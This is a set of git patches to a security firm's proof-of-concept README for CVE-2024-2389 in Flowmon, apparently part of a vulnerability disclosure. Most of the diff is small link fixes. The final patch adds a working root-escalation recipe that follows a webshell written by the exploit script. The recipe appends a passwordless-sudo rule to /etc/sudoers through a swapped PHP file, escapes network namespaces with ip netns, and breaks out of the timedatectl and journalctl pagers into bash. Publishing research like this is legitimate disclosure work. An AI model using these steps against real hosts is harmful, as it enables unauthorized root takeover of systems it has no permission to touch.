From 8b8f155b45962d1dad60d42073d6b16c078b1f33 Mon Sep 17 00:00:00 2001
From: Dave Yesland <41924355+DaveYesland@users.noreply.github.com>
Date: Tue, 23 Apr 2024 06:59:26 -0700
Subject: [PATCH 1/3] Update README.md

---
 CVE-2024-2389/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md
index 9f3749a..6346c1b 100644
--- a/CVE-2024-2389/README.md
+++ b/CVE-2024-2389/README.md
@@ -22,4 +22,4 @@ To write a simple webshell:
 Then visit TARGET/rce.php  
 
 ### Screenshot
-![Alt-text that shows up on hover](poc_image.png)
\ No newline at end of file
+![poc_image](https://github.com/RhinoSecurityLabs/CVEs/assets/41924355/56e95c42-3541-4768-862d-7d272db6ee8f)

From b080ab1e70184fa57a6e03f0c0abb5044d1c6b2d Mon Sep 17 00:00:00 2001
From: Dave Yesland <41924355+DaveYesland@users.noreply.github.com>
Date: Tue, 23 Apr 2024 06:59:40 -0700
Subject: [PATCH 2/3] Delete CVE-2024-2389/poc_image.png

---
 CVE-2024-2389/poc_image.png | 1 -
 1 file changed, 1 deletion(-)
 delete mode 100644 CVE-2024-2389/poc_image.png

diff --git a/CVE-2024-2389/poc_image.png b/CVE-2024-2389/poc_image.png
deleted file mode 100644
index 4a17b1e..0000000
--- a/CVE-2024-2389/poc_image.png
+++ /dev/null
@@ -1 +0,0 @@
-This should be an image showing the successful exploit
\ No newline at end of file

From c8b5df5428517c20acfaf1deed35b9c966adba6c Mon Sep 17 00:00:00 2001
From: Dave Yesland <41924355+DaveYesland@users.noreply.github.com>
Date: Tue, 23 Apr 2024 07:08:08 -0700
Subject: [PATCH 3/3] Update README.md

---
 CVE-2024-2389/README.md | 25 ++++++++++++++++++++++++-
 1 file changed, 24 insertions(+), 1 deletion(-)

diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md
index 6346c1b..70b55de 100644
--- a/CVE-2024-2389/README.md
+++ b/CVE-2024-2389/README.md
@@ -5,7 +5,7 @@
 **Versions Affected:** Tested on v12.03.02  
 **Version Fixed:** 12.3.5/11.1.14  
 **Researcher:** Dave Yesland (https://x.com/daveysec)  
-**Disclosure Link:** https://rhinosecuritylabs.com/  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/  
 **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2389  
 **Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability  
 
@@ -21,5 +21,28 @@ To write a simple webshell:
 `python3 CVE-2024-2389 --web-shell TARGET`  
 Then visit TARGET/rce.php  
 
+A root shell can be obtained through several methods:
+```
+cp /var/www/shtml/index.php /tmp/index.php.bak;
+echo '<?php system("echo \"ADMINS ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"); ?>' > /var/www/shtml/index.php;
+sudo /usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource s;
+cp /tmp/index.php.bak /var/www/shtml/index.php;
+
+# ip command:
+sudo ip netns add foo
+sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
+sudo ip netns exec bar /bin/bash
+sudo ip netns delete foo
+sudo ip netns delete bar
+
+# Abusing the timedatectl command:
+sudo timedatectl list-timezones
+!/bin/bash
+
+#Abusing journalctl
+sudo journalctl
+!/bin/bash
+```
+
 ### Screenshot
 ![poc_image](https://github.com/RhinoSecurityLabs/CVEs/assets/41924355/56e95c42-3541-4768-862d-7d272db6ee8f)